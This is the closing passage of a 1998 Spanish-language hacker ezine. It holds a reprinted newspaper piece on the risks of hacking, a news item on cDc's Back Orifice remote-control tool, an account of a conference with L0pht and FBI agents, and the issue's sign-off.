consideran los wannabees. Otro experto, Charles Palmer, el cabezilla del grupo de IBM "ethical hackers" miro el problema de forma diferente, y reconocio que existen unos 100 hackers realmente peligrosos por el mundo hoy en dia. Una de las actividades de este grupo es extraer pruebas de los sistemas que han sido invadidos, buscar evidencias forenses como por ejemplo fragmentos de codigo en las herramientas usadas, pero dejadas escondidas en el sistema. Hoy, el anonimato de la World Wide Web y la publicidad que los ataques generan - especialmente aquellos sistemas importantes en Internet que han sido hackeados - estimulan esta labor. ¨ Realmente es tan grave el problema del hacking ? Considerando esta estadistica : En un periodo de 12 meses se han registrado unos 250.000 intentos de entrada en los ordenadores de US Air Force, segun las noticias de ZDNet. Despues fueron robados en 1996 de una surcusal del Citibank unos 10 millones de dolares. Esto indica el serio peligro de los intrusos informaticos. Ninguna red puede considerarse inmune contra los intrusos, fuera de la compa¤ia o dentro de ella, y aumentar la seguridad debe ser una de las principales tareas de una empresa. Al igual que el dinero es guardado en sitio seguro, los datos tambien lo deberian estar. E incluso los cerrojos y las llaves (palabras de paso) tiene que ser cambiados frecuentemente, mientras aquellos encargados de uan red de ordenadores tienen que estar alerta de los avisos de seguridad que van apareciendo que conciernen a los diferentes sistemas operativos o las aplicaciones asi como las nuevas fallos que se van descubriendo y publicados casi diariamente. Los expertos en seguridad constantemente avisan que nunca es suficiente concenciarse sobre la importancia de la seguridad y sobre los aparentes sistemas informaticos detras de un cortafuegos, etc. pueden ser facilmente comprometidos por un experto hacker o un espia industrial. Recientemente tuve una charla con un experto en seguridad de la empresa Sun Microsystems quien me explico que en Sun existe una regla fundamental: Si alquien pone un modem en la red de la corporacion sera gravemente penalizado. (Esto puede ser un punto vulnerable de una red. Un empleado quien necesita llamar a Internet a lo mejor conecta un modem en la red de su desktop - y no cuenta nada al encargado porque existe una estricta politica en este aspecto y ademas estan demasiados ocupados para ayudar.) Los Hackers generalmente no actuan con intenciones criminales, pero en algunos casos como el de Citibank ilustra que una cosa puede llevar a la otra. Aqui, la experencia de conseguir acceso y controlar sistemas informaticos de bancos fue desarrollado por un grupo de Hackers rusos que estaban interesados en obtener ventajas economicas. La etica Hacker para estos intrusos fue como exploracion y no para robar. Por otro lado, drogado y depresivo, uno de los Hackers vendio los secretos por $100 y 2 botellas de vodka, permitiendo que las organizaciones criminales pudiesen robar 10 millones de dolares. El tema de hacking nunca desaparecera, y por el momento casi nunca es inocente - pero si destructivo - muchos de ellos se interesan en poder saltarse las barreras de los sistemas informaticos, en algunos casos puede costar caro cuando los datos han sido accidentalmente borrados o comprometidos. Es el juego del gato y el raton, reflejando un lado perveso en la naturaleza del hombre (como los virus informaticos, que son destructivos o benignos.) Pero es una larga carrera, como el coste del fraude con tarjetas de credito, cualquiera puede ser el que tenga que pagar a un experto en seguridad para examinar el da¤o que su sistema a sufrido por la actividad hacking. Por supuesto prevenirse es la mejor cura. Es mejor minimizar el coste de una actividad hacking manteniendo a un experto en seguridad o un consultor y poder mantener un buen nivel de productividad. Es tambien critico mantener al dia los riesgos, los peligros y las apropiadas acciones a seguir en caso de riesgo en esta lucha por la habilidad. Tony Waltham es el editor de Database. BANGKOK POST 12/08/98 P7 <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> EL NT EN EL PUNTO DE MIRA DE LOS HACKERS. 13Aug98 USA. Los Hackers que han distribuido un programa para controlar remotamente el Windows 95 y 98 han avisado que pueden sacar una version para el Windows NT, escribe Steve Ranger. El grupo americano the Cult of the Dead Cow (cDc) la semana pasada distribuyo el Back Orifice, una herramienta que permite tomar el control desde un PC a otro PC sin el conocimiento del usuario. El cDc dice que el Back Orifice a sido bajado del web durante los cuatro primeros dias desde que fue puesta unas 35.000 veces. Una version que permite a los Hackers controlar una maquina basada en Windows desde Unix a sido distribuida, y el cDc dice que esta trabajando en una version que permita controlar remotamente el NT. Microsoft alega que los usuarios que usen procedimientos de seguridad, como servidores proxy, cortafuegos y no bajan ningun tipo de codigo desde sitios desconocidos deberian estar a salvo de esta herramienta. El cDc desmienta esto. 'Existen varias maneras de que el programa corra en un ordenador Windows, no solo sin la aprobacion del usuario, pero si sin el conocimiento del usuario,' dice el portavoz del cDc. Paul Ducklin, cabezilla del grupo de anti-virus Sophos, dice que el Back Orifice 'es un programa que hace lo que dice - control remoto en un Windows 95'. El Back Orifice da la oportunidada a los Hackers de controlar casi todas las partes del sistema incluyendo el registro, el sistema de ficheros y la teclas pulsadas. La herramienta de administracion remota tambien puede ser usada legitimamente para soporte tecnico remoto o administracion remota de una red. COMPUTING 13/08/98 P2 <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> - J.J.F. / HACKERS TEAM - ESTUVO CON L0PHT EN MIT. El dia 16/9 - J.J.F. / HACKERS TEAM - asistio a una conferencia referente al mundo de los Hackers. Esta conferencia fue patronicada por la AIP (Association of Internet Professionals, Boston, Massachusetts Chapter.), en la cual se invito a varios conferenciantes, la jefa encargada de los delitos informaticos de FBI de Massachusetts, 2 agentes de esta division, un experto en seguridad y a el Dr. Mudge del grupo L0pth, conocido grupo de hackers residentes en Boston. La conferencia fue muy divertida, ya que los de L0pth no siente demasiado afecto al FBI por lo que se pudo oir, ya que durante la conferencia Mudge aprovecho para burlarse de los agentes del FBI, ademas quedaron realmente mal cuando los propios agente del FBI no eran capazes de responder a varias preguntas de Mudge y de los propios oyentes, unicamente contestaban con evasivas :) Como anecdota decir que los de L0pth ivan con sus camisetas oficiales y nosotros, ivamos con las nuestras tambien pero ademas con la gorras tambien, provocando que cuando entramos en la sala todo la gente se quedo boquiabiertos y los de L0pth se comenzaron al reir cuando vieron otro grupo Hacker entra en la sala. Desde aqui mandamos un saludo a la gente de L0pth, por ser tan agradables con nosotros y en especial a Dr. Mudge. Para mas informacion sobre la conferencia os remito a los siguientes url's: http://www.l0pht.com/index.html http://boston.us.association.org/ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Pues aqui acaba este magnifico numero o eso pensamos, pero por supuesto que el proximo intentaremos que sea mejor :) pero logicamente necesitamos vuestra colaboracion. Como ya hemos dicho varias veces en este ezine puede escribir quien quiera, da igual si eres policia, administrador, etc. para eso estamos nosotros para expandir vuestras opiniones. Aqui publicamos H/C/P/V, seguridad, cursillos, de todo un poco :) A ver si para el siguiente numero os damos varias sorpresas que seguro que seran noticia por todos lados, ya que - J.J.F. / HACKERS TEAM - se lanza a la carga. Bueno, se acabo lo que se daba y una feliz vuelta a clase a todos nuestros lectores. Pues eso, escribe a: jjf_team@usa.net ADIOS Y HASTA EL SIGUIENTE NUMERO!!! - J.J.F. / HACKERS TEAM - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=